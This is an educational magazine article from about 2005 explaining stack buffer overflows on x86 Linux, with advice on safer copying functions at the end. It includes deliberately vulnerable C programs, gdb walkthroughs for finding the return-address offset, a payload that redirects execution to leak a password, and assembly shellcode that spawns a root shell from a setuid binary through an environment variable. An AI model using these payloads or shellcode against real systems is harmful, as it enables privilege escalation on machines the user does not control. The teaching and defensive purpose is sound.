The Oldest Trick in the Book

Learn about buffer overflow exploits and how to avoid them.

As the reach and deployment of computer technology expand, the risks and problems associated with pervasive use and the often breakneck speed of innovation and adoption intrude more and more frequently. And while numerous security advisories are issued every day, those alerts probably represent only a tiny fraction of the faults that exist and have yet to be discovered, whether by the good guys or the bad guys.

One serious problem is vulnerability, where a fault or an oversight in a software application allows unauthorized access to the computer. While some vulnerabilities are “mostly harmless” (for instance, spyware may be unwanted, but is otherwise benign), other vulnerabilities can undermine privacy and even breach security measures. A significant weakness can even permit a malcontent to trick a program into doing something it wasn’t designed to do; an attack that takes advantage of such a weakness is called an exploit.

Oddly enough, the most commonly exploited weakness, the buffer overflow, is also the oldest. Around since the infancy of computers in the 1960s, the buffer overflow first gained widespread notoriety in 1988, when the first Internet worm, Morris (named after its creator), propagated by exploiting a buffer overflow vulnerability in the fingerd daemon. More than a decade later, Internet worms like Code Red and Blaster propagated by exploiting buffer overflows, too. Today, a calculator may have more computing power than the Apollo spacecraft, but the more things change, the more they stay the same.

On to the main() Event

Since there’s no explanation better than experience, here is a simple body of code that’s vulnerable to a buffer overflow:

$ cat vuln.c
#include <string.h>

int main(int argc, char *argv[])
{
  char buffer[10];
  strcpy(buffer, argv[1]);
  return 0;
}

The code expects a single command-line argument, which is then copied into the ten-character buffer, buffer. However, because the program doesn’t check the length of the command-line argument before the strcpy(), it can suffer an overflow. Compile and run the program to see what happens:

$ gcc -o vuln vuln.c
$ ./vuln AAAAAAA
$ ./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
$ 

The program crashes with a segmentation fault, which means that something important was overwritten by the unexpected extra data. You can see specifically what happened by looking at the program’s dumped core file using a debugger like gdb.

$ ulimit -c unlimited
$ ./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
$ gdb -q -c core
Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) info register eip
eip 0x41414141 0x41414141
(gdb) info stack
0x41414141: Cannot access memory at address 0x41414141
(gdb) quit
$

The ulimit command allows core dumps to get as big as needed, so this time, vuln with a large argument produces a core file. gdb reveals that the vuln program crashed because the extended instruction pointer (EIP) was set to 0x41414141. (Why 0x41414141? 0x41 is hexadecimal for the character “A.”) Since this is a memory address that cannot be accessed, the program crashed.

A little background on how a program actually works would probably be helpful here. The EIP is just a 32-bit register that holds the address of the instruction the processor is about to execute. All of the program’s instructions are stored in a memory segment called the text segment. If the text segment is a book filled with instructions, then the EIP is a finger pointing to words as it reads them.

Easy enough, but oftentimes the program has to jump around in the text segment in a non-linear fashion. When a function is called, for example, the EIP has to jump to a different part of the text segment to execute the function, but afterwards it needs to be able to return to where it was to execute the next instruction. Continuing with the book metaphor, what’s needed here is some sort of bookmark, so the program can set a bookmark, jump to the function, execute it, and then return to the bookmark. This is what another section of memory called the stack is used for.

Additionally, the stack provides each function with its own context, which allows each function to have its own local variables that only it knows about. So every time a function is called, a stack frame is created that contains the local variables for that function and the return address, so program execution can continue after the function completes. (The stack is also used to pass arguments to functions, which the function treats as local variables, too.)

Each stack frame is stored on the stack, which is a “First In, Last Out” (FILO) structure. (Imagine putting beads on a string with a knot on the end. The first bead you put on is the last one to come off.) When a stack frame is put on the stack, it is pushed onto the stack; when a stack frame is removed from the stack, it is popped from the stack. This structure proves to be useful when multiple functions are called within each other.

For example, consider functions.c, shown in Listing One.

LISTING ONE: functions.c, a C program with nested function calls

$ cat functions.c
int j = 11;

int func2()
{
  int i = 7;
  printf("\t\tIn function #2\n");
  printf("\t\ti = %d, j = %d\n", i, j);
  printf("\t\tExiting function #2\n");
  return 0;
}

int func1()
{
  int i = 5;
  printf("\tIn function #1\n");
  printf("\ti = %d, j = %d\n", i, j);
  func2();
  printf("\tExiting function #1\n");
  return 0;
}

int main()
{
  int i = 3;
  printf("In main\n");
  printf("i = %d, j = %d\n", i, j);
  func1();
  printf("Exiting main\n");
  return 0;
}

If you build the code with gcc -g -o functions functions.c and run it with ./functions, you should see this:

In main
i = 3, j = 11
	In function #1
	i = 5, j = 11
		In function #2
		i = 7, j = 11
		Exiting function #2
	Exiting function #1
Exiting main

j is a global variable, so it's available in every function context and is stored in a completely different segment of memory. When main() is executed, a stack frame is created and pushed to the stack containing its local variables, where i is 3. When func1() is called within main(), another stack frame is created with both the return address to get back to the next instruction in main() and func1()'s local variables. Within func1(), i is 5. Next func2() is called from func1(), which creates yet another stack frame with the return address for the next instruction in func1() and func2()'s local variables, where i is 7. After each function completes, its stack frame is popped off and the EIP is restored to continue execution where the calling function left off.

These different stack frames can be examined with gdb. Run gdb -q functions and then set breakpoints before and after each function is called to pause the program's execution and give you a chance to look at the stack frames. This is shown in Figure One.

FIGURE ONE: Examining the stack of Listing One in gdb

$ gdb -q functions
(gdb) list 1
1       int j = 11;
2
3       int func2()
4       {
5               int i = 7;
6               printf("\t\tIn function #2\n");
7               printf("\t\ti = %d, j = %d\n", i, j);
...
29              return 0;
30      }
(gdb) break 7
Breakpoint 1 at 0x8048351: file functions.c, line 7.
(gdb) break 16
Breakpoint 2 at 0x8048399: file functions.c, line 16.
(gdb) break 18
Breakpoint 3 at 0x80483ba: file functions.c, line 18.
(gdb) break 26
Breakpoint 4 at 0x80483f0: file functions.c, line 26.
(gdb) break 28
Breakpoint 5 at 0x8048411: file functions.c, line 28.
(gdb) run
Starting program: /home/matrix/research/article/functions
In main
Breakpoint 4, main () at functions.c:26
26              printf("i = %d, j = %d\n", i, j);
(gdb) info stack
#0  main () at functions.c:26
#1  0x4003890b in __libc_start_main () from /lib/libc.so.6
(gdb) continue
Continuing.
i = 3, j = 11
	In function #1
Breakpoint 2, func1 () at functions.c:16
16              printf("\ti = %d, j = %d\n", i, j);
(gdb) info stack
#0  func1 () at functions.c:16
#1  0x08048411 in main () at functions.c:27
#2  0x4003890b in __libc_start_main () from /lib/libc.so.6
(gdb) continue
Continuing.
	i = 5, j = 11
		In function #2
Breakpoint 1, func2 () at functions.c:7
7               printf("\t\ti = %d, j = %d\n", i, j);
(gdb) info stack
#0  func2 () at functions.c:7
#1  0x080483ba in func1 () at functions.c:17
#2  0x08048411 in main () at functions.c:27
#3  0x4003890b in __libc_start_main () from /lib/libc.so.6
(gdb) continue
Continuing.
		i = 7, j = 11
		Exiting function #2
Breakpoint 3, func1 () at functions.c:18
18              printf("\tExiting function #1\n");
(gdb) info stack
#0  func1 () at functions.c:18
#1  0x08048411 in main () at functions.c:27
#2  0x4003890b in __libc_start_main () from /lib/libc.so.6
(gdb) continue
Continuing.
	Exiting function #1
Breakpoint 5, main () at functions.c:28
28              printf("Exiting main\n");
(gdb) info stack
#0  main () at functions.c:28
#1  0x4003890b in __libc_start_main () from /lib/libc.so.6
(gdb) continue
Continuing.
Exiting main
Program exited normally.
(gdb) quit

At breakpoint 4, the program is still in the main() function, so main() is the only stack frame (besides the libc start frame). The execution continues to breakpoint 2 in func1() just before func2() is called. Here another stack frame can be seen on the stack for func1(). As execution continues to breakpoint 1 found within func2(), another stack frame is pushed to the stack for func2().

Then execution continues through to breakpoint 3, which is found back in func1() after the func2() call. Here, func2()'s stack frame has been popped off the stack and the return address is used to return EIP into func1(). Finally, breakpoint 5 is reached near the end of main(), and func1()'s stack frame has similarly been popped off the stack to return execution to main().

Given how the stack frame works, with the return address located near the end of the stack frame and local variables found at the beginning, if a local variable overflows, it can overwrite the return address.

Returning to the vuln program, its EIP was set to 0x41414141 because the local variable buffer overflowed and overwrote the return address in the stack frame. Then when the program popped that frame off and tried to return to where its metaphorical bookmark was, it crashed. Since the buffer is supplied by user input and the buffer can overflow into the return address, the EIP and the execution of the program can be controlled by the user.

Your First Exploit

Let’s try to control the EIP of the vuln program and set it to 0x12345678. First, you need to identify exactly where the return address is in relation to buffer. (This is usually farther out than one would expect since the compiler pads a bit.) Since the x86 is a 32-bit architecture, everything on the stack is in 32-bit words (four 8-bit bytes), so the search can be done using blocks of 4 characters. Run vuln with an argument composed of 24 “A”s, then 4 “B”s, 4 “C”s, and 4 “D”s.

$ ./vuln `perl -e 'print "AAAA"x6 . "BBBB" . "CCCC" . "DDDD";'`
Segmentation fault (core dumped)
$ gdb -q -c core
Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDD'.
Program terminated with signal 11, Segmentation fault.
#0  0x43434343 in ?? ()
(gdb) info register eip
eip            0x43434343       0x43434343
(gdb) quit

If you examine core, EIP is set to 0x43434343, corresponding to “CCCC”. This means that the return address is located 28 bytes from the beginning of the buffer (24 “A”s plus 4 “B”s). This information can be used to overwrite the return address.

$ ./vuln `perl -e 'print "A"x28 . "\x12\x34\x56\x78";'`
Segmentation fault (core dumped)
$ gdb -q -c core
Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAA4Vx'.
Program terminated with signal 11, Segmentation fault.
#0 0x78563412 in ?? ()
(gdb) info register eip
eip 0x78563412 0x78563412
(gdb) quit

That almost worked, but the bytes are reversed. This is because the x86 architecture is little-endian: the least significant byte is stored first. This means that if you want to overwrite an address, you need to supply its bytes in reverse order.

$ ./vuln `perl -e 'print "A"x28 . "\x78\x56\x34\x12";'`
Segmentation fault (core dumped)
$ gdb -q -c core
Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAxV4'.
Program terminated with signal 11, Segmentation fault.
#0 0x12345678 in ?? ()
(gdb) info register eip
eip 0x12345678 0x12345678
(gdb) quit

EIP has been set to 0x12345678 thanks to the buffer overflow.

Onwards and Downwards

Let's take a look at a slightly bigger and more intriguing program, shown in Listing Two.

LISTING TWO: admin.c, a program vulnerable to a buffer overflow

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// global variable
char password[9];

// function
void view_password()
{
  printf("The admin password is currently \'%s\'\n", password);
}

// main program
int main(int argc, char *argv[])
{
  int c = 0; // menu choice, initialized so the loop test is well defined
  char buffer[10];

  // Obfuscation of the password (so it can't be retrieved w/ strings)
  password[0] = 83; password[1] = 67; password[2] = password[6] = 79;
  password[3] = 82; password[4] = 80; password[5] = 73;
  password[7] = 78; /* password is SCORPION */

  if(argc < 2) // If no argument is supplied,
  { // display a usage message and quit
    printf("Usage: %s \n", argv[0]);
    exit(0);
  }

  strcpy(buffer, argv[1]); // unchecked copy: this is the vulnerability

  if(strcmp(buffer, password) == 0) // if password is correct
  { // display the admin menu
    printf("Access Granted\nWelcome to the admin menu..\n");
    while(c != 2)
    {
      printf("-= Admin Menu =-\n\n1 - View Password\n2 - Exit\n-> ");
      scanf("%d", &c);
      if(c == 1) view_password();
    }
  }
  else // otherwise display denial message
  {
    printf("Incorrect Password\nAccess Denied.\n");
  }
  return 0;
}

Listing Two checks for a command-line password to allow access to a fairly useless administration menu. (Just pretend the admin menu has a plethora of other options, since its robustness isn’t the point of this program.) Let’s compile it and play around with it a little bit.

$ gcc -o admin admin.c
$ ./admin
Usage: ./admin
$ ./admin test
Incorrect Password
Access Denied.
$ ./admin god
Incorrect Password
Access Denied.

As you can see, the program works as expected and the password isn’t test or god. Now let’s see what happens if we overflow the expected password argument.

$ ./admin AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Incorrect Password
Access Denied.
Segmentation fault (core dumped)
$ gdb -q -c core
Core was generated by `./admin AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) info register eip
eip 0x41414141 0x41414141
(gdb) info stack
#0 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb) quit

The program crashes just as vuln did, and with a little experimentation, you can set the EIP as before. What would be more useful, though, is to get the password. The function view_password() prints the password whenever it is called. Since we can now control the EIP, we can bypass all of the program’s logic and go directly to this function if we know its address in the text segment. Fortunately (or perhaps unfortunately), this can be found using gdb.

$ gdb -q admin
(gdb) break main
Breakpoint 1 at 0x804842a
(gdb) run
Starting program: /home/matrix/research/article/admin
Breakpoint 1, 0x0804842a in main ()
(gdb) print view_password
$1 = {<text variable, no debug info>} 0x8048408 <view_password>

Now we know that view_password() is found at 0x08048408 in the text segment. You can use this information to get that password.

$ ./admin `perl -e 'print "A"x44 . "\x08\x84\x04\x08";'`
Incorrect Password
Access Denied.
The admin password is currently 'SCORPION'
Segmentation fault (core dumped)
$

It Gets Worse

A buffer overflow exploit is especially serious on multi-user systems like Linux, where permissions determine what files can be read, written to, and executed. Some programs must run with the privileges of the superuser, root, no matter which user starts them. These programs are called setuid root programs, since they are owned by root and have what’s known as the set user ID (suid) permission turned on. One example is the /usr/bin/passwd program:

$ ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root 27500 Jan 5 03:13 /usr/bin/passwd

(The suid bit is the s that appears in place of the owner’s x in the permissions string, -rwsr-xr-x.)

Since /usr/bin/passwd allows users to change their passwords, the program needs to be able to write to the password file (typically, /etc/passwd). Obviously, the system cannot be set up so just anyone can write to the password file; instead, /usr/bin/passwd runs as if it’s the root user and makes the changes.

But as we saw earlier, if a buffer overflow exists, the program logic can be totally bypassed. Let's assume that the admin program shown in Listing Two has to modify some root-owned files, so admin needs to be suid root. The commands to make admin setuid root are chown and chmod:

$ sudo chown root.root ./admin
$ sudo chmod u+s ./admin
$ ls -l ./admin
-rwsr-xr-x 1 root root 7589 Mar 13 22:18 ./admin

If the admin program actually did modify some root-owned files, you could set EIP to various functions found in the text segment like before, allowing you to bypass the program logic. However, you are still limited to the instructions found in the text segment. Returning to the book metaphor, you can trick the program into reading instructions it wouldn't have usually read, but you are still limited by the instructions printed in the book.

But what if you could staple your own handwritten instructions to the back of the book and then move the bookmark there? These instructions could be crafted to say something to the effect of “Accept commands from the user and do whatever you’re told to do.” Something like that would be devastating if that program was set suid root, since the program would act as a proxy, effectively giving the user full root access to the system.

And indeed you can staple your own pages using specially crafted instructions called shellcode. Shellcode can be inserted into a different memory segment, such as the stack, and execution can be moved out of the text segment into the shellcode.

For example, the shellcode shown in Listing Three restores root user permissions and then executes an interactive shell.

LISTING THREE: shellcode.asm, an example of shellcode

BITS 32
; setreuid(uid_t ruid, uid_t euid)
xor eax, eax ; first eax must be 0 for the next instruction
mov al, 70 ; put 70 into eax, since setreuid is syscall #70
xor ebx, ebx ; put 0 into ebx, to set real uid to root
xor ecx, ecx ; put 0 into ecx, to set effective uid to root
int 0x80 ; Call the kernel to make the system call happen
jmp short two ; Jump down to the bottom for the call trick
one:
pop ebx ; pop the "return address" from the stack
; to put the address of the string into ebx
; execve(const char *filename, char *const argv [], char *const envp[])
xor eax, eax ; zero out eax again
mov [ebx+7], al ; put the 0 from eax where the X is in the string
; ( 7 bytes offset from the beginning)
mov [ebx+8], ebx ; put the address of the string from ebx where the
; AAAA is in the string ( 8 bytes offset)
mov [ebx+12], eax ; put a NULL address (4 bytes of 0) where the
; BBBB is in the string ( 12 bytes offset)
mov al, 11 ; Now put 11 into eax, since execve is syscall #11
lea ecx, [ebx+8] ; Load the address of where the AAAA was in the string
; into ecx
lea edx, [ebx+12] ; Load the address of where the BBBB was in the string
; into edx
int 0x80 ; Call the kernel to make the system call happen
two:
call one ; Use a call to get back to the top and get the
db '/bin/sh' ; address of this string

So how do you inject the shellcode? One way is via environment variables.

Environment variables are stored in stack memory, so that provides a convenient place to inject the shellcode.

$ nasm shellcode.asm
$ ls -l shellcode
-rw-r--r-- 1 matrix users 46 Mar 13 23:47 shellcode
$ export SHELLCODE=`cat shellcode`
$ echo 'main(){printf("%p\n",getenv("SHELLCODE"));}' > envaddr.c
$ gcc -o eaddr envaddr.c
$ ./eaddr
0xbffff8e8

Above, the shellcode is assembled using nasm and the assembled shellcode is stored in an environment variable aptly named SHELLCODE. Then a simple program is quickly coded and compiled to predict the address of the shellcode when the admin program is executed. This program must have the same number of characters in its name as the target program, since the name of the executing program shifts values on the stack.

Now, if EIP is set to the address (0xbffff8e8), the program's execution flows into the shellcode. Since the program is suid root, the program opens a shell as root, giving you full access to the system.

$ ./admin `perl -e 'print "A"x44 . "\xe8\xf8\xff\xbf";'`
Incorrect Password
Access Denied.
sh-2.05b# whoami
root
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel)
sh-2.05b# exit

Not only does the shellcode bypass the program's logic, it allows the user to make the program do things on his behalf that it wasn't even designed to do. And this type of arbitrary control over a suid root program has a severe impact on the security of the system.

Heads Up!

Buffer overflows have been around for decades and are simply the result of insecure programming practices. There are some methods, like non-executable stacks (see the sidebar), that try to mitigate these types of vulnerabilities, but there really is no substitute for security-conscious programming practices.

Functions like strncpy() and strlcpy() copy at most a specified number of bytes, which gives you more control than strcpy(). (Be aware that strncpy() does not null-terminate the destination when the source is too long, so you must terminate it yourself.) There is nothing inherently wrong with strcpy() as long as you can be certain that the destination is at least as large as the source, terminating null byte included. Just try to think about what would happen if someone were to input an extra-large piece of data, because if it's a public program, someone out there eventually will.

According to the National Institute of Standards and Technology, in the past 4 years, 871 buffer overflow vulnerabilities were exploited, comprising about 20 percent of all exploits.

The world of computers has developed astronomically since the 1960s, yet buffer overflow vulnerabilities have persisted. It’s 2005 now — perhaps it’s about time for general programming practices to catch up.